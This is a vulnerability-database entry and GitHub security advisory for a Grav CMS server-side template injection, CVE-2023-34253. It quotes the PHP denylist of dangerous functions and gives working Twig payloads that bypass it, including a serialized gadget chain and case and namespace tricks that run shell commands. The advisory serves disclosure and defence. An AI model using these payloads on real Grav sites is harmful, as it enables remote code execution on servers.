CVE-2023-34253 (GCVE-0-2023-34253)

Vulnerability from cvelistv5

Published

2023-06-14 22:00

Modified

2024-12-18 21:39

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-184 - Incomplete List of Disallowed Inputs
CWE-1336 - Improper Neutralization of Special Elements Used in a Template Engine

Summary

Grav is a flat-file content management system. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist.

References

►

URL

Tags

security-advisories@github.com	https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190	Issue Tracking
security-advisories@github.com	https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b	Patch
security-advisories@github.com	https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm	Exploit, Vendor Advisory
security-advisories@github.com	https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/	Exploit, Third Party Advisory
security-advisories@github.com	https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190	Issue Tracking
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b	Patch
af854a3a-2127-422b-91ae-364da2661108	https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm	Exploit, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108	https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83	Patch

Impacted products

	Vendor	Product	Version
	getgrav	grav	Version: < 1.7.42

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T16:01:54.414Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"
          },
          {
            "name": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
          },
          {
            "name": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"
          },
          {
            "name": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"
          },
          {
            "name": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-34253",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-12-18T21:39:27.743179Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-12-18T21:39:39.981Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "grav",
          "vendor": "getgrav",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.7.42"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Grav is a flat-file content management system. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-184",
              "description": "CWE-184: Incomplete List of Disallowed Inputs",
              "lang": "en",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "cweId": "CWE-1336",
              "description": "CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-06-14T22:16:52.675Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"
        },
        {
          "name": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
        },
        {
          "name": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"
        },
        {
          "name": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"
        },
        {
          "name": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
        }
      ],
      "source": {
        "advisory": "GHSA-j3v8-v77f-fvgm",
        "discovery": "UNKNOWN"
      },
      "title": "Grav vulnerable to Server-side Template Injection (SSTI) via Denylist Bypass"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2023-34253",
    "datePublished": "2023-06-14T22:00:12.569Z",
    "dateReserved": "2023-05-31T13:51:51.175Z",
    "dateUpdated": "2024-12-18T21:39:39.981Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-34253\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2023-06-14T23:15:11.037\",\"lastModified\":\"2024-11-21T08:06:52.047\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Grav is a flat-file content management system. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":7.2,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":1.2,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-184\"},{\"lang\":\"en\",\"value\":\"CWE-1336\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.7.42\",\"matchCriteriaId\":\"758F84B9-A2EC-45D8-86DD-B309DB02B9AE\"}]}]}],\"references\":[{\"url\":\"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Issue Tracking\"]},{\"url\":\"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm\", \"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b\", \"name\": \"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190\", \"name\": \"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/\", \"name\": \"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83\", \"name\": \"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T16:01:54.414Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-34253\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-12-18T21:39:27.743179Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-12-18T21:39:36.036Z\"}}], \"cna\": {\"title\": \"Grav vulnerable to Server-side Template Injection (SSTI) via Denylist Bypass\", \"source\": {\"advisory\": \"GHSA-j3v8-v77f-fvgm\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"getgrav\", \"product\": \"grav\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.7.42\"}]}], \"references\": [{\"url\": \"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm\", \"name\": \"https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b\", \"name\": \"https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190\", \"name\": \"https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/\", \"name\": \"https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/\", \"tags\": [\"x_refsource_MISC\"]}, {\"url\": \"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83\", \"name\": \"https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Grav is a flat-file content management system. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-184\", \"description\": \"CWE-184: Incomplete List of Disallowed Inputs\"}]}, {\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-1336\", \"description\": \"CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2023-06-14T22:16:52.675Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-34253\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-12-18T21:39:39.981Z\", \"dateReserved\": \"2023-05-31T13:51:51.175Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2023-06-14T22:00:12.569Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

ghsa-j3v8-v77f-fvgm

Vulnerability from github

Published

2023-06-16 19:36

Modified

2023-06-16 19:36

Severity ?

7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Summary

Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability

Details

Hi,

actually we have sent the bug report to security@getgrav.org on 27th March 2023 and on 10th April 2023.

Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability

Summary:

| Product | Grav CMS | | ----------------------- | --------------------------------------------- | | Vendor | Grav | | Severity | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution | | Affected Versions | <= v1.7.40 (Commit 685d762) (Latest version as of writing) | | Tested Versions | v1.7.40 | | Internal Identifier | STAR-2023-0006 | | CVE Identifier | Reserved CVE-2023-30592, CVE-2023-30593, CVE-2023-30594 | | CWE(s) | CWE-184: Incomplete List of Disallowed Inputs, CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine |

CVSS3.1 Scoring System:

Base Score: 7.2 (High)
Vector String: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
| Metric | Value | | ---------------------------- | --------- | | Attack Vector (AV) | Network | | Attack Complexity (AC) | Low | | Privileges Required (PR) | High | | User Interaction (UI) | None | | Scope (S) | Unchanged | | Confidentiality (C) | High | | Integrity (I) | High | | Availability (A) | High |

Product Overview:

Grav is a PHP-based flat-file content management system (CMS) designed to provide a fast and simple way to build websites. It supports rendering of web pages written in Markdown and Twig expressions, and provides an administration panel to manage the entire website via an optional Admin plugin.

Vulnerability Summary:

The denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution.

Vulnerability Details:

In addressing CVE-2022-2073, a denylist was introduced in commit 9d6a2d to validate and ensure that dangerous functions could not be executed via injection of malicious templates.

The implementation of the denylist can be found in Utils::isDangerousFunction() within /system/src/Grav/Common/Utils.php: ~~~php /* * @param string $name * @return bool / public static function isDangerousFunction(string $name): bool { static $commandExecutionFunctions = [ 'exec', 'passthru', 'system', 'shell_exec', 'popen', 'proc_open', 'pcntl_exec', ];

    static $codeExecutionFunctions = [
        'assert',
        'preg_replace',
        'create_function',
        'include',
        'include_once',
        'require',
        'require_once'
    ];

    static $callbackFunctions = [
        'ob_start' => 0,
        'array_diff_uassoc' => -1,
        'array_diff_ukey' => -1,
        'array_filter' => 1,
        'array_intersect_uassoc' => -1,
        'array_intersect_ukey' => -1,
        'array_map' => 0,
        'array_reduce' => 1,
        'array_udiff_assoc' => -1,
        'array_udiff_uassoc' => [-1, -2],
        'array_udiff' => -1,
        'array_uintersect_assoc' => -1,
        'array_uintersect_uassoc' => [-1, -2],
        'array_uintersect' => -1,
        'array_walk_recursive' => 1,
        'array_walk' => 1,
        'assert_options' => 1,
        'uasort' => 1,
        'uksort' => 1,
        'usort' => 1,
        'preg_replace_callback' => 1,
        'spl_autoload_register' => 0,
        'iterator_apply' => 1,
        'call_user_func' => 0,
        'call_user_func_array' => 0,
        'register_shutdown_function' => 0,
        'register_tick_function' => 0,
        'set_error_handler' => 0,
        'set_exception_handler' => 0,
        'session_set_save_handler' => [0, 1, 2, 3, 4, 5],
        'sqlite_create_aggregate' => [2, 3],
        'sqlite_create_function' => 2,
    ];

    static $informationDiscosureFunctions = [
        'phpinfo',
        'posix_mkfifo',
        'posix_getlogin',
        'posix_ttyname',
        'getenv',
        'get_current_user',
        'proc_get_status',
        'get_cfg_var',
        'disk_free_space',
        'disk_total_space',
        'diskfreespace',
        'getcwd',
        'getlastmo',
        'getmygid',
        'getmyinode',
        'getmypid',
        'getmyuid'
    ];

    static $otherFunctions = [
        'extract',
        'parse_str',
        'putenv',
        'ini_set',
        'mail',
        'header',
        'proc_nice',
        'proc_terminate',
        'proc_close',
        'pfsockopen',
        'fsockopen',
        'apache_child_terminate',
        'posix_kill',
        'posix_mkfifo',
        'posix_setpgid',
        'posix_setsid',
        'posix_setuid',
    ];

    if (in_array($name, $commandExecutionFunctions)) {
        return true;
    }

    if (in_array($name, $codeExecutionFunctions)) {
        return true;
    }

    if (isset($callbackFunctions[$name])) {
        return true;
    }

    if (in_array($name, $informationDiscosureFunctions)) {
        return true;
    }

    if (in_array($name, $otherFunctions)) {
        return true;
    }

    return static::isFilesystemFunction($name);
}

/**
 * @param string $name
 * @return bool
 */
public static function isFilesystemFunction(string $name): bool
{
    static $fileWriteFunctions = [
        'fopen',
        'tmpfile',
        'bzopen',
        'gzopen',
        // write to filesystem (partially in combination with reading)
        'chgrp',
        'chmod',
        'chown',
        'copy',
        'file_put_contents',
        'lchgrp',
        'lchown',
        'link',
        'mkdir',
        'move_uploaded_file',
        'rename',
        'rmdir',
        'symlink',
        'tempnam',
        'touch',
        'unlink',
        'imagepng',
        'imagewbmp',
        'image2wbmp',
        'imagejpeg',
        'imagexbm',
        'imagegif',
        'imagegd',
        'imagegd2',
        'iptcembed',
        'ftp_get',
        'ftp_nb_get',
    ];

    static $fileContentFunctions = [
        'file_get_contents',
        'file',
        'filegroup',
        'fileinode',
        'fileowner',
        'fileperms',
        'glob',
        'is_executable',
        'is_uploaded_file',
        'parse_ini_file',
        'readfile',
        'readlink',
        'realpath',
        'gzfile',
        'readgzfile',
        'stat',
        'imagecreatefromgif',
        'imagecreatefromjpeg',
        'imagecreatefrompng',
        'imagecreatefromwbmp',
        'imagecreatefromxbm',
        'imagecreatefromxpm',
        'ftp_put',
        'ftp_nb_put',
        'hash_update_file',
        'highlight_file',
        'show_source',
        'php_strip_whitespace',
    ];

    static $filesystemFunctions = [
        // read from filesystem
        'file_exists',
        'fileatime',
        'filectime',
        'filemtime',
        'filesize',
        'filetype',
        'is_dir',
        'is_file',
        'is_link',
        'is_readable',
        'is_writable',
        'is_writeable',
        'linkinfo',
        'lstat',
        //'pathinfo',
        'getimagesize',
        'exif_read_data',
        'read_exif_data',
        'exif_thumbnail',
        'exif_imagetype',
        'hash_file',
        'hash_hmac_file',
        'md5_file',
        'sha1_file',
        'get_meta_tags',
    ];

    if (in_array($name, $fileWriteFunctions)) {
        return true;
    }

    if (in_array($name, $fileContentFunctions)) {
        return true;
    }

    if (in_array($name, $filesystemFunctions)) {
        return true;
    }

    return false;
}

~~~

The list of banned functions appears to be adapted from a StackOverflow post. While the denylist looks rather comprehensive, there are actually multiple issues with the denylist implementation: 1. There may be unsafe functions, be it built-in to PHP or user-defined, which are not be blocked. For example, unserialize() and aliases of blocked functions, such as ini_alter(), are not being included in the denylist.
2. A case-sensitive comparison is performed against the denylist, but PHP function names are case-insensitive. This allows using filter('SYSTEM') to trivially bypass the denylist validation check.
3. Fully qualified names can be used when referencing functions, allowing filter('\system') to trivially bypass the denylist validation checks.

Exploit Conditions:

This vulnerability can be exploited if the attacker has access to: 1. an administrator account, or 2. a non-administrative user account with the following permissions granted: - login access to Grav admin panel, and - page creation or update rights

Reproduction Steps:

Log in to Grav Admin using an administrator account.
Navigate to Accounts > Add, and ensure that the following permissions are assigned when creating a new low-privileged user:
- Login to Admin - Allowed
- Page Update - Allowed
Log out of Grav Admin, and log back in using the account created in step 2.
Navigate to http://<grav_installation>/admin/pages/home.
Click the Advanced tab and select the checkbox beside Twig to ensure that Twig processing is enabled for the modified webpage.
Under the Content tab, insert the following payload within the editor: ~~~twig // Method 1: Using unserialize() to trigger system('id') call // Serialized payloaed generated using the phpggc tool: ./phpggc -b Monolog/RCE7 system 'id' // {{ 'TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aTowO319czoxMzoiACoAcHJvY2Vzc29ycyI7YToyOntpOjA7czozOiJwb3MiO2k6MTtzOjY6InN5c3RlbSI7fX0=' | base64_decode | array | filter('unserialize') }}

// Method 2: Trigger system('id') via case-insensitive function names {{ ['id'] | filter('System') }}

// Method 3: Trigger system('id') via fully qualified names when referencing functions {{ ['id'] | filter('\system') }} ~~~
7. Click the Preview button. Observe that the output of the id shell command is returned in the preview.

Suggested Mitigations:

It is recommended to review the list of functions, both default functions in PHP and user-defined functions, and include missing unsafe functions in the denylist. A non-exhaustive list of missing unsafe functions discovered is shown below: - unserialize() - ini_alter() - simplexml_load_file() - simplexml_load_string() - forward_static_call() - forward_static_call_array()

The Utils::isDangerousFunction() function in /system/src/Grav/Common/Utils.php should also be patched to disallow usage of fully qualified names when specifying callables, as well as ensure that validation performed on the $name parameter is case-insensitive.

For example, ~~~diff php ... abstract class Utils { ... /* * @param string $name * @return bool / public static function isDangerousFunction(string $name): bool { ... + if ($arrow instanceof Closure) { + return false; + }

$name = strtolower($name);
if (strpos($name, "\") !== false) {
return false;

}

if (in_array($name, $commandExecutionFunctions)) {
    return true;
}

if (in_array($name, $codeExecutionFunctions)) {
    return true;
}

if (isset($callbackFunctions[$name])) {
    return true;
}

if (in_array($name, $informationDiscosureFunctions)) {
    return true;
}

if (in_array($name, $otherFunctions)) {
    return true;
}

return static::isFilesystemFunction($name);

} ... } ~~~

End users should also ensure that twig.undefined_functions and twig.undefined_filters properties in /path/to/webroot/system/config/system.yaml configuration file are set to false to disallow Twig from treating undefined filters/functions as PHP functions and executing them.

Detection Guidance:

Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at /path/to/webroot/logs/grav.log by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts.

Credits:

Ngo Wei Lin (@Creastery) & Wang Hengyue (@w_hy_04) of STAR Labs SG Pte. Ltd. (@starlabs_sg)

The scheduled disclosure date is 25th July, 2023. Disclosure at an earlier date is also possible if agreed upon by all parties.

Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report:
